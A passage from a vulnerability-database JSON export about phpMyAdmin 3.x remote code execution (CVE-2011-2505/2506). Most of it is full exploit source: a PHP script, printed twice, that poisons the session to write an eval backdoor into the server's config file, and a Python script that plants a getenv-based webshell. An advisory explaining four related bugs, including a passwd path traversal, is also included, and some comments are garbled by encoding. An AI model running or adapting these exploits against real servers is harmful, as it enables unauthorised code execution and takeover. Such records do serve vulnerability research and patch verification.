e:\n print e\n\nif __name__ == \"__main__\" : main(sys.argv)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:06:03", "description": "\nphpMyAdmin 3.x - Swekey Remote Code Injection", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "exploitpack", "title": "phpMyAdmin 3.x - Swekey Remote Code Injection", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-09T00:00:00", "id": "EXPLOITPACK:951813AECD0336F4B9E6C4A40606C23E", "href": "", "sourceData": "<?php /*\n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit\n# Date: 2011-07-09\n# Author: Mango of ha.xxor.se\n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 \n# CVE : CVE-2011-2505, CVE-2011-2506\n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt\n# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\n*/\necho php_sapi_name()!=='cli'?'<pre>':'';?>\n .\n , )\\ .\n . ,/) , / ) , )\\\n )\\( /)/( (__( /( / ) __ __ ________ __ __\n / \\ ( )| |) \\ / | |\\ /| | | | | | | | (__)\n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____\n \\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | |\n | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|\n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \n phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []\n Remote Code Injection [] [][] [] [] [] [] [] []\n http://ha.xxor.se [][] [] [] [] [][] [][] [] [] \n\t _ _ ___ __ ____ __ ___ ___ \n\t| |-| || _ |\\ /\\ /| _ || ) \n\t|_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \n ___ ___ ___ _ _ ___ ___ __ __ \n ( < | [_ / /| || || )(_)| |\\ | /\n >__)|_[_ \\__\\|____||_|_\\|_| |_| |_|\n\nUse responsibly.\n\n<?php echo php_sapi_name()!=='cli'?'</pre>':'';\n\nif(php_sapi_name()==='cli'){\n\tif(!isset($argv[1])){\n\t\toutput(\" Usage\\n \".$argv[0].\" http://example.com/phpMyAdmin-3.3.9.2\");\n\t\tkillme();\n\t}\n\t$pmaurl = $argv[1];\t\n}else{\n\t$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';\n}\n$code = 'foreach($_GET as $k=>$v)if($k===\"eval\")eval($v);';\n$cookie = null;\n$token = null;\nif(!function_exists('curl_init')){\n\toutput('[!] Fatal error. Need cURL!');\n\tkillme();\n}\n$ch = curl_init();\n$debug = 0;\nif(php_sapi_name()!=='cli'){\n?>\n<form method=post>\nURL: <input name=url value=\"<?php echo htmlspecialchars($pmaurl);?>\"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>\n<input name=submit type=submit value=\u2665>\n</form>\n<pre>\n<?php\nif(!isset($_REQUEST['submit']))killme(true);\n}\n\noutput(\"[i] Running...\");\n\n// Start a session and get a token\ncurl_setopt_array($ch, array(\n\tCURLOPT_URL => $pmaurl.'/setup/index.php',\n\tCURLOPT_HEADER => 1,\n\tCURLOPT_RETURNTRANSFER => 1,\n\tCURLOPT_TIMEOUT => 4,\n\tCURLOPT_SSL_VERIFYPEER => false,\n\tCURLOPT_SSL_VERIFYHOST => false\n));\noutput(\"[*] Contacting server to retrive session cookie and token.\");\n\n$result = curl_exec($ch);\nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){\n\toutput(\"[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.\");\n\tkillme();\n}\nif(!$result){\n\toutput(\"[!] cURL error:\".curl_error($ch));\n\tkillme();\n}\nif(false !== strpos($result, 'Cannot load or save configuration')){\n\toutput(\"[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.\");\n\tkillme();\n}\n\n// Extract cookie\npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches);\n$cookie = $matches[1];\noutput(\"[i] Cookie:\".$cookie);\n// Extract token\npreg_match('/(token=|token\" value=\")([0-9a-f]{32})/', $result, $matches);\n$token = $matches[2];\noutput(\"[i] Token:\".$token);\n\n// Poison _SESSION variable\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);\ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);\noutput(\"[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.\");\nif(!$result = curl_exec($ch)){\n\toutput(\"[!] cURL error:\".curl_error($ch));\n\tkillme();\n}\n\n//echo htmlspecialchars($result,ENT_QUOTES);\n\n// Save file\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');\ncurl_setopt($ch, CURLOPT_POST, 1);\ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);\noutput(\"[*] Contacting server to make it save the injected code to a file.\");\nif(!$result = curl_exec($ch)){\n\toutput(\"[!] cURL error:\".curl_error($ch));\n\tkillme();\n}\n\n//echo htmlspecialchars($result,ENT_QUOTES);\n\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');\ncurl_setopt($ch, CURLOPT_POST, 0);\noutput(\"[*] Contacting server to test if the injected code executes.\");\nif(!$result = curl_exec($ch)){\n\toutput(\"[!] cURL error:\".curl_error($ch));\n\tkillme();\n}\nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){\n\toutput(\"[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!\");\n\toutput(\"[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';\");\n}else{\n\toutput(\"[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.\");\n}\n\n\ncurl_close($ch);\n\nfunction output($msg){\n\techo php_sapi_name()!=='cli'?htmlspecialchars(\"$msg\\n\",ENT_QUOTES):\"$msg\\n\";\n\tflush();\n}\n\nfunction killme(){\n\toutput(\"[*] Exiting...\");\n\techo php_sapi_name()!=='cli'?'<pre>':'';\n\tdie();\n}\n\necho php_sapi_name()!=='cli'?'<pre>':'';?>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:51", "description": "", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "packetstorm", "title": "phpMyAdmin3 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-09T00:00:00", "id": "PACKETSTORM:102941", "href": "https://packetstormsecurity.com/files/102941/phpMyAdmin3-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python \n# coding=utf-8 \n# pma3 - phpMyAdmin3 remote code execute exploit \n# Author: wofeiwo<wofeiwo@80sec.com> \n# Thx Superhei \n# Tested on: 3.1.1, 3.2.1, 3.4.3 \n# CVE: CVE-2011-2505, CVE-2011-2506 \n# Date: 2011-07-08 \n# Have fun, DO *NOT* USE IT TO DO BAD THING. \n################################################ \n \n# Requirements: 1. \"config\" directory must created&writeable in pma directory. \n# 2. session.auto_start = 1 in php.ini configuration. \n \n \nimport os,sys,urllib2,re \n \ndef usage(program): \nprint \"PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code \nexecute exploit\" \nprint \"Usage: %s <PMA_url>\" % program \nprint \"Example: %s http://www.test.com/phpMyAdmin\" % program \nsys.exit(0) \n \ndef main(args): \ntry: \nif len(args) < 2: \nusage(args[0]) \n \nif args[1][-1] == \"/\": \nargs[1] = args[1][:-1] \n \n# \ufffd\ufffd\u04bb\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u0221token\ufffd\ufffdsessionid\ufffd\ufffdsessionid\ufffd\ufffdphpMyAdmin\ufffd\ufffd\u05b5\ufffd\ufffd\u04bb\ufffd\u00b5\ufffd \nprint \"[+] Trying get form token&session_id..\" \ncontent = urllib2.urlopen(args[1]+\"/index.php\").read() \nr1 = re.findall(\"token=(\\w{32})\", content) \nr2 = re.findall(\"phpMyAdmin=(\\w{32,40})\", content) \n \nif not r1: \nr1 = re.findall(\"token\\\" value=\\\"(\\w{32})\\\"\", content) \nif not r2: \nr2 = re.findall(\"phpMyAdmin\\\" value=\\\"(\\w{32,40})\\\"\", content) \nif len(r1) < 1 or len(r2) < 1: \nprint \"[-] Cannot find form token and session id...exit.\" \nsys.exit(-1) \n \ntoken = r1[0] \nsessionid = r2[0] \nprint \"[+] Token: %s , SessionID: %s\" % (token, sessionid) \n \n# \ufffd\u06b6\ufffd\ufffd\ufffd\ufffd\ufffd\u0368\ufffd\ufffdswekey.auth.lib.php\ufffd\ufffd\ufffd\ufffd$_SESSION\ufffd\ufffd\u05b5 \nprint \"[+] Trying to insert payload in $_SESSION..\" \nuri = \"/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA\" \nurl = args[1]+uri \n \nopener = urllib2.build_opener() \nopener.addheaders.append(('Cookie', 'phpMyAdmin=%s; \npma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' % \n(sessionid, sessionid))) \nurllib2.install_opener(opener) \nurllib2.urlopen(url) \n \n# \ufffd\ufffd\ufffd\ufffdsetup\ufffd\ufffd\u0221shell \nprint \"[+] Trying get webshell..\" \npostdata = \n\"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save\" \n% (sessionid, token) \nurl = args[1]+\"/setup/config.php\" \n \n# print \"[+]Postdata: %s\" % postdata \nurllib2.urlopen(url, postdata) \nprint \"[+] All done, pray for your lucky!\" \n \n# \ufffd\ufffd\ufffd\u0132\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdshell \nurl = args[1]+\"/config/config.inc.php\" \nopener.addheaders.append(('Code', 'phpinfo();')) \nurllib2.install_opener(opener) \nprint \"[+] Trying connect shell: %s\" % url \nresult = re.findall(\"System \\</td\\>\\<td \nclass=\\\"v\\\"\\>(.*)\\</td\\>\\</tr\\>\", urllib2.urlopen(url).read()) \nif len(result) == 1: \nprint \"[+] Lucky u! System info: %s\" % result[0] \nprint \"[+] Shellcode is: eval(getenv('HTTP_CODE'));\" \n \nelse: \nprint \"[-] Cannot get webshell.\" \n \nexcept Exception, e: \nprint e \n \nif __name__ == \"__main__\" : main(sys.argv) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/102941/pma3-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:14:25", "description": "", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 3.x Swekey Remote Code Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-09T00:00:00", "id": "PACKETSTORM:102940", "href": "https://packetstormsecurity.com/files/102940/phpMyAdmin-3.x-Swekey-Remote-Code-Injection.html", "sourceData": "`<?php /* \n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit \n# Date: 2011-07-09 \n# Author: Mango of ha.xxor.se \n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 \n# CVE : CVE-2011-2505, CVE-2011-2506 \n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt \n# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html \n*/ \necho php_sapi_name()!=='cli'?'<pre>':'';?> \n. \n, )\\ . \n. ,/) , / ) , )\\ \n)\\( /)/( (__( /( / ) __ __ ________ __ __ \n/ \\ ( )| |) \\ / | |\\ /| | | | | | | | (__) \n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____ \n\\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | | \n| |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__| \n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \nphpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] [] \nRemote Code Injection [] [][] [] [] [] [] [] [] \nhttp://ha.xxor.se [][] [] [] [] [][] [][] [] [] \n_ _ ___ __ ____ __ ___ ___ \n| |-| || _ |\\ /\\ /| _ || ) \n|_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \n___ ___ ___ _ _ ___ ___ __ __ \n( < | [_ / /| || || )(_)| |\\ | / \n>__)|_[_ \\__\\|____||_|_\\|_| |_| |_| \n \nUse responsibly. \n \n<?php echo php_sapi_name()!=='cli'?'</pre>':''; \n \nif(php_sapi_name()==='cli'){ \nif(!isset($argv[1])){ \noutput(\" Usage\\n \".$argv[0].\" http://example.com/phpMyAdmin-3.3.9.2\"); \nkillme(); \n} \n$pmaurl = $argv[1]; \n}else{ \n$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:''; \n} \n$code = 'foreach($_GET as $k=>$v)if($k===\"eval\")eval($v);'; \n$cookie = null; \n$token = null; \nif(!function_exists('curl_init')){ \noutput('[!] Fatal error. Need cURL!'); \nkillme(); \n} \n$ch = curl_init(); \n$debug = 0; \nif(php_sapi_name()!=='cli'){ \n?> \n<form method=post> \nURL: <input name=url value=\"<?php echo htmlspecialchars($pmaurl);?>\"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/> \n<input name=submit type=submit value=\u2665> \n</form> \n<pre> \n<?php \nif(!isset($_REQUEST['submit']))killme(true); \n} \n \noutput(\"[i] Running...\"); \n \n// Start a session and get a token \ncurl_setopt_array($ch, array( \nCURLOPT_URL => $pmaurl.'/setup/index.php', \nCURLOPT_HEADER => 1, \nCURLOPT_RETURNTRANSFER => 1, \nCURLOPT_TIMEOUT => 4, \nCURLOPT_SSL_VERIFYPEER => false, \nCURLOPT_SSL_VERIFYHOST => false \n)); \noutput(\"[*] Contacting server to retrive session cookie and token.\"); \n \n$result = curl_exec($ch); \nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){ \noutput(\"[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.\"); \nkillme(); \n} \nif(!$result){ \noutput(\"[!] cURL error:\".curl_error($ch)); \nkillme(); \n} \nif(false !== strpos($result, 'Cannot load or save configuration')){ \noutput(\"[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.\"); \nkillme(); \n} \n \n// Extract cookie \npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches); \n$cookie = $matches[1]; \noutput(\"[i] Cookie:\".$cookie); \n// Extract token \npreg_match('/(token=|token\" value=\")([0-9a-f]{32})/', $result, $matches); \n$token = $matches[2]; \noutput(\"[i] Token:\".$token); \n \n// Poison _SESSION variable \ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token); \ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie); \noutput(\"[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.\"); \nif(!$result = curl_exec($ch)){ \noutput(\"[!] cURL error:\".curl_error($ch)); \nkillme(); \n} \n \n//echo htmlspecialchars($result,ENT_QUOTES); \n \n// Save file \ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php'); \ncurl_setopt($ch, CURLOPT_POST, 1); \ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token); \noutput(\"[*] Contacting server to make it save the injected code to a file.\"); \nif(!$result = curl_exec($ch)){ \noutput(\"[!] cURL error:\".curl_error($ch)); \nkillme(); \n} \n \n//echo htmlspecialchars($result,ENT_QUOTES); \n \ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);'); \ncurl_setopt($ch, CURLOPT_POST, 0); \noutput(\"[*] Contacting server to test if the injected code executes.\"); \nif(!$result = curl_exec($ch)){ \noutput(\"[!] cURL error:\".curl_error($ch)); \nkillme(); \n} \nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){ \noutput(\"[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!\"); \noutput(\"[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';\"); \n}else{ \noutput(\"[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.\"); \n} \n \n \ncurl_close($ch); \n \nfunction output($msg){ \necho php_sapi_name()!=='cli'?htmlspecialchars(\"$msg\\n\",ENT_QUOTES):\"$msg\\n\"; \nflush(); \n} \n \nfunction killme(){ \noutput(\"[*] Exiting...\"); \necho php_sapi_name()!=='cli'?'<pre>':''; \ndie(); \n} \n \necho php_sapi_name()!=='cli'?'<pre>':'';?> \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/102940/phpmyadminswekey-inject.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:13:24", "description": "", "cvss3": {}, "published": "2011-07-08T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 3.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2011-07-08T00:00:00", "id": "PACKETSTORM:102908", "href": "https://packetstormsecurity.com/files/102908/phpMyAdmin-3.x-Remote-Code-Execution.html", "sourceData": "`phpMyAdmin 3.x Multiple Remote Code Executions \n \nThis post details a few interesting vulnerabilities I found while relaxing and reading the sourcecode of phpMyAdmin. My original advisory can be found here. \n \nIf you would like me to audit your PHP project, check out Xxor's PHP code auditing service. \n \nThe first vulnerability \nFile: libraries/auth/swekey/swekey.auth.lib.php \nLines: 266-276 \nPatched in: 3.3.10.2 and 3.4.3.1 \nType: Variable Manipulation \nAssigned CVE id: CVE-2011-2505 \nPMA Announcement-ID: PMASA-2011-5 \n \n266 if (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false) \n267 { \n268 parse_str($_SERVER['QUERY_STRING']); \n269 session_write_close(); \n270 session_id($session_to_unset); \n271 session_start(); \n272 $_SESSION = array(); \n273 session_write_close(); \n274 session_destroy(); \n275 exit; \n276 } \n \nNotice the call to parse_str on line 268 that passes the query string as it's first argument. It's missing a second argument. This means that what ever parameters and values are present in the query string will be used as variables in the current namespace. But since the code path that executes the call to parse_str inevitably leads to a call to exit there ain't much to exploit. However the session variables persists between requests. Thus giving us full control of the $_SESSION array. \n \nFrom here on there are numerous XSS and SQL injection vulnerabilities open for attack. But we'll focus on three far more serious vulnerabilities. \n \n \nThe second vulnerability \nPatched in: 3.3.10.2 and 3.4.3.1 \nType: Remote Static Code Injection \nAssigned CVE id: CVE-2011-2506 \nPMA Announcement-ID: PMASA-2011-6 \n \nFile: setup/lib/ConfigGenerator.class.php \nLines: 16-78 \n16 /** \n17 * Creates config file \n18 * \n19 * @return string \n20 */ \n21 public static function getConfigFile() \n22 { \n23 $cf = ConfigFile::getInstance(); \n24 \n25 $crlf = (isset($_SESSION['eol']) && $_SESSION['eol'] == 'win') ? \"\\r\\n\" : \"\\n\"; \n26 $c = $cf->getConfig(); \n27 \n28 // header \n29 $ret = 'get('PMA_VERSION') \n34 . ' setup script' . $crlf \n35 . ' * Date: ' . date(DATE_RFC1123) . $crlf \n36 . ' */' . $crlf . $crlf; \n37 \n38 // servers \n39 if ($cf->getServerCount() > 0) { \n40 $ret .= \"/* Servers configuration */$crlf\\$i = 0;\" . $crlf . $crlf; \n41 foreach ($c['Servers'] as $id => $server) { \n42 $ret .= '/* Server: ' . strtr($cf->getServerName($id), '*/', '-') . \" [$id] */\" . $crlf \n43 . '$i++;' . $crlf; \n44 foreach ($server as $k => $v) { \n45 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k); \n46 $ret .= \"\\$cfg['Servers'][\\$i]['$k'] = \" \n47 . (is_array($v) && self::_isZeroBasedArray($v) \n48 ? self::_exportZeroBasedArray($v, $crlf) \n49 : var_export($v, true)) \n50 . ';' . $crlf; \n51 } \n52 $ret .= $crlf; \n53 } \n54 $ret .= '/* End of servers configuration */' . $crlf . $crlf; \n55 } \n56 unset($c['Servers']); \n57 \n58 // other settings \n59 $persistKeys = $cf->getPersistKeysMap(); \n60 \n61 foreach ($c as $k => $v) { \n62 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k); \n63 $ret .= self::_getVarExport($k, $v, $crlf); \n64 if (isset($persistKeys[$k])) { \n65 unset($persistKeys[$k]); \n66 } \n67 } \n68 // keep 1d array keys which are present in $persist_keys (config.values.php) \n69 foreach (array_keys($persistKeys) as $k) { \n70 if (strpos($k, '/') === false) { \n71 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k); \n72 $ret .= self::_getVarExport($k, $cf->getDefault($k), $crlf); \n73 } \n74 } \n75 $ret .= '?>'; \n76 \n77 return $ret; \n78 } \n \nOn line 42 in this file a comment is created to show some additional information in a config file. We can see that the output of the call to $cf->getServerName($id) is sanitized to prevent user input from closing the comment. However $id, the key of the $c['Servers'] array, is not. So if we could rename a key in this array we could close the comment and inject arbitrary PHP code. \nOn line 26 the $c array is created from a call to $cf->getConfig(). \n \nFile: libraries/config/ConfigFile.class.php \nLines: 469-482 \n469 /** \n470 * Returns configuration array (full, multidimensional format) \n471 * \n472 * @return array \n473 */ \n474 public function getConfig() \n475 { \n476 $c = $_SESSION[$this->id]; \n477 foreach ($this->cfgUpdateReadMapping as $map_to => $map_from) { \n478 PMA_array_write($map_to, $c, PMA_array_read($map_from, $c)); \n479 PMA_array_remove($map_from, $c); \n480 } \n481 return $c; \n482 } \n \nBingo! The $c array is derived from the $_SESSION array hence we could have full control of its contents by utilizing the first vulnerability. Now we can inject arbitrary PHP code that will be saved into the file config/config.inc.php. Then we would just browse to this file and the webserver would executed it. \n \nThis vulnerability requires one specific condition. The config directory must have been left in place after the initial configuration. This is something advised against and hence a majority of servers wont be susceptible to this attack. Therefor we'll check out a third and a fourth vulnerability. \n \n \nThe third vulnerability \nPatched in: 3.3.10.2 and 3.4.3.1 \nType: Authenticated Remote Code Execution \nAssigned CVE id: CVE-2011-2507 \nPMA Announcement-ID: PMASA-2011-7 \n \nFile: server_synchronize.php \nLine: 466 \n466 $trg_db = $_SESSION['trg_db']; \nLine: 477 \n477 $uncommon_tables = $_SESSION['uncommon_tables']; \nLine: 674 \n674 PMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, $uncommon_tables, $uncommon_table_structure_diff[$s], $uncommon_tables_fields, false); \nFile: libraries/server_synchronize.lib.php \nLines: 613-631 \n613 function PMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, &$uncommon_tables, $table_index, &$uncommon_tables_fields, $display) \n614 { \n615 if (isset($uncommon_tables[$table_index])) { \n616 $fields_result = PMA_DBI_get_fields($src_db, $uncommon_tables[$table_index], $src_link); \n617 $fields = array(); \n618 foreach ($fields_result as $each_field) { \n619 $field_name = $each_field['Field']; \n620 $fields[] = $field_name; \n621 } \n622 $uncommon_tables_fields[$table_index] = $fields; \n623 \n624 $Create_Query = PMA_DBI_fetch_value(\"SHOW CREATE TABLE \" . PMA_backquote($src_db) . '.' . PMA_backquote($uncommon_tables[$table_index]), 0, 1, $src_link); \n625 \n626 // Replace the src table name with a `dbname`.`tablename` \n627 $Create_Table_Query = preg_replace('/' . PMA_backquote($uncommon_tables[$table_index]) . '/', \n628 PMA_backquote($trg_db) . '.' .PMA_backquote($uncommon_tables[$table_index]), \n629 $Create_Query, \n630 $limit = 1 \n631 ); \n \nThe variables $uncommon_tables[$table_index] and $trg_db are derived from the $_SESSION array. By utilizing the first vulnerability we can inject what ever we want into both the first and the second argument of the function preg_replace on lines 627-631. In a previous post to this blog I've detailed how this condition can be turned into a remote code execution. Basicly we can inject the \"e\" modifier into the regexp pattern which causes the second argument to be executed as PHP code. \n \nThis vulnerability have two major restrictions from an attackers perspective. First the Suhosin patch that completly defends against this type of attack. Second, this piece of code can only be reached if we're authenticated. So to exploit it we would need to have previous knowledge of credentials to an account of the database that phpMyAdmin is set up to manage. Except for some obscure configurations that allows us to bypass this restriction. \n \nSince the Suhosin patch is pretty popular, and for example compiled by default in OpenBSD's PHP packages, it's worth exploring a fourth vulnerability. \n \n \nThe fourth vulnerability \nPatched in: 3.3.10.2 and 3.4.3.1 \nType: Path Traversal \nAssigned CVE id: CVE-2011-2508 \nPMA Announcement-ID: PMASA-2011-8 \n \nFile: libraries/display_tbl.lib.php \nLines: 1291-1299 \n1291 if ($GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME']) { \n1292 \n1293 if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) && isset($GLOBALS['mime_map'][$meta->name]['transformation']) && !empty($GLOBALS['mime_map'][$meta->name]['transformation'])) { \n1294 $include_file = $GLOBALS['mime_map'][$meta->name]['transformation']; \n1295 \n1296 if (file_exists('./libraries/transformations/' . $include_file)) { \n1297 $transformfunction_name = str_replace('.inc.php', '', $GLOBALS['mime_map'][$meta->name]['transformation']); \n1298 \n1299 require_once './libraries/transformations/' . $include_file; \n \n \nThis fourth vulnerability is a directory traversal in a call to require_once which can be exploited as a local file inclusion. The variable $GLOBALS['mime_map'][$meta->name]['transformation'] is derived from user input. For example, by setting $GLOBALS['mime_map'][$meta->name]['transformation'] to \"../../../../../../etc/passwd\" the local passwd-file could show up. \n \nThis vulnerability can only be reached if we're authenticated and requires that the transformation feature is setup correctly in phpMyAdmin's configuration storage. However, the $GLOBALS['cfgRelation'] array is derived from the $_SESSION array. Hence the variable $GLOBALS['cfgRelation']['mimework'] used to check this can be modified using the first vulnerability. \n \nFile: libraries/display_tbl.lib.php \nLines: 707-710 \n707 if ($GLOBALS['cfgRelation']['commwork'] && $GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME'] && ! $_SESSION['tmp_user_values']['hide_transformation']) { \n708 require_once './libraries/transformations.lib.php'; \n709 $GLOBALS['mime_map'] = PMA_getMIME($db, $table); \n710 } \nAnd the fact that $GLOBALS['mime_map'] is conditionally initialized together with the fact that phpMyAdmin registers all request variables in the global namespace (blacklists some, but not mime_map) allows us to set $GLOBALS['mime_map'][$meta->name]['transformation'] to whatever we want, even when the transformation feature is not setup correctly. \n \n \nSummary \n \nIf the config folder is left in place, phpMyAdmin is vulnerable. \n \nIf an attacker has access to database credentials and the Suhosin patch is not installed, phpMyAdmin is vulnerable. \n \nIf an attacker has access to database credentials and knows how to exploit a local file inclution, phpMyAdmin is vulnerable. \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/102908/phpmyadmin3-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "PMA3 rce\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2012-01-26T00:00:00", "type": "dsquare", "title": "Phpmyadmin 3.x RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2013-04-02T00:00:00", "id": "E-15", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-12-02T16:52:56", "description": "", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "exploitdb", "title": "phpMyAdmin 3.x - Swekey Remote Code Injection", "bulletinFamily": "exploit", "cvss2": 